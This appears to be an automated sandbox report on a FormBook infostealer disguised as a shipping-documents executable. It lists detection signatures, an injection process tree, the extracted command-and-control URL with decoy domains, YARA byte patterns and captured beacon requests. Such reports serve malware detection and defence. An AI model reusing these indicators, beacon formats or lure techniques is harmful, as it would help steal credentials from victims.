Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 202139769574 Shipping Documents.exe

Overview

General Information

Sample Name:202139769574 Shipping Documents.exe
Analysis ID:403523
MD5:eee5f618718bc8237bb9c7a48154cf1a
SHA1:84dc873f65dc9e86978944d1adddb762efcf2631
SHA256:cc7b066e0fa912d406c27790458ad6feb171b27275b6e3fe46b7a7574da7bfce
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 202139769574 Shipping Documents.exe (PID: 6728 cmdline: 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: EEE5F618718BC8237BB9C7A48154CF1A)
    • 202139769574 Shipping Documents.exe (PID: 6808 cmdline: 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: EEE5F618718BC8237BB9C7A48154CF1A)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 5892 cmdline: /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.magnumopuspro.com/nyr/"], "decoy": ["anemone-vintage.com", "ironcitytools.com", "joshandmatthew.com", "breathtakingscenery.photos", "karabakh-terror.com", "micahelgall.com", "entretiendesterrasses.com", "mhgholdings.com", "blewm.com", "sidewalknotary.com", "ytrs-elec.com", "danhpham.com", "ma21cle2henz.xyz", "lotusforlease.com", "shipleyphotoandfilm.com", "bulktool.xyz", "ouedzmala.com", "yichengvpr.com", "connectmygames.com", "chjcsc.com", "dope-chocolate.com", "tacowench.com", "projectsbay.com", "xn--pgboc92d.com", "royaldropofoil.com", "ranguanglian.club", "mobilne-kucice.com", "buytsycon.com", "goiasbets.net", "blpetroleum.com", "starrealms.net", "exclusiveflooringcollection.com", "kudalive.com", "tienda-sky.com", "drillinginsider.info", "theglasshousenyc.com", "vietnammoi.xyz", "walterbenicio.com", "zoomtvliveshows.xyz", "boujiehoodbaby.com", "yzyangyu.com", "exploreecetera.com", "sycord.com", "waykifood.com", "shadingconsultancy.com", "precedentai.net", "linhanhkitchen.com", "expekt24.com", "socialdating24.com", "lubvim.com", "floryi.com", "alerist.com", "maluss.com", "hitbbq.com", "alerrandrotattoo.com", "algoplayer.com", "idahooutsiders.com", "qygmuakhk.club", "neverpossible.com", "winparadigm.com", "toughdecorative.com", "yourbuildmedia.com", "summercrowd.com", "josemvazquez.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.magnumopuspro.com/nyr/"], "decoy": ["anemone-vintage.com", "ironcitytools.com", "joshandmatthew.com", "breathtakingscenery.photos", "karabakh-terror.com", "micahelgall.com", "entretiendesterrasses.com", "mhgholdings.com", "blewm.com", "sidewalknotary.com", "ytrs-elec.com", "danhpham.com", "ma21cle2henz.xyz", "lotusforlease.com", "shipleyphotoandfilm.com", "bulktool.xyz", "ouedzmala.com", "yichengvpr.com", "connectmygames.com", "chjcsc.com", "dope-chocolate.com", "tacowench.com", "projectsbay.com", "xn--pgboc92d.com", "royaldropofoil.com", "ranguanglian.club", "mobilne-kucice.com", "buytsycon.com", "goiasbets.net", "blpetroleum.com", "starrealms.net", "exclusiveflooringcollection.com", "kudalive.com", "tienda-sky.com", "drillinginsider.info", "theglasshousenyc.com", "vietnammoi.xyz", "walterbenicio.com", "zoomtvliveshows.xyz", "boujiehoodbaby.com", "yzyangyu.com", "exploreecetera.com", "sycord.com", "waykifood.com", "shadingconsultancy.com", "precedentai.net", "linhanhkitchen.com", "expekt24.com", "socialdating24.com", "lubvim.com", "floryi.com", "alerist.com", "maluss.com", "hitbbq.com", "alerrandrotattoo.com", "algoplayer.com", "idahooutsiders.com", "qygmuakhk.club", "neverpossible.com", "winparadigm.com", "toughdecorative.com", "yourbuildmedia.com", "summercrowd.com", "josemvazquez.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 202139769574 Shipping Documents.exeVirustotal: Detection: 33%Perma Link
          Source: 202139769574 Shipping Documents.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 202139769574 Shipping Documents.exeJoe Sandbox ML: detected
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 202139769574 Shipping Documents.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 202139769574 Shipping Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 202139769574 Shipping Documents.exe, 00000001.00000003.646868549.0000000003230000.00000004.00000001.sdmp, 202139769574 Shipping Documents.exe, 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, mstsc.exe, 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 202139769574 Shipping Documents.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_004059F0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040659C FindFirstFileA,FindClose,1_2_0040659C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 4x nop then pop esi2_2_004172F1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 4x nop then pop edi2_2_0040E429
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop esi7_2_004872F1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi7_2_0047E429

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.magnumopuspro.com/nyr/
          Source: global trafficHTTP traffic detected: GET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1Host: www.maluss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1Host: www.exclusiveflooringcollection.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1Host: www.maluss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1Host: www.exclusiveflooringcollection.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.magnumopuspro.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 202139769574 Shipping Documents.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 202139769574 Shipping Documents.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.909702700.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_0040548D

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: 202139769574 Shipping Documents.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: 202139769574 Shipping Documents.exe
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419D60 NtCreateFile,2_2_00419D60
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419E10 NtReadFile,2_2_00419E10
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00419E90 NtClose,2_2_00419E90
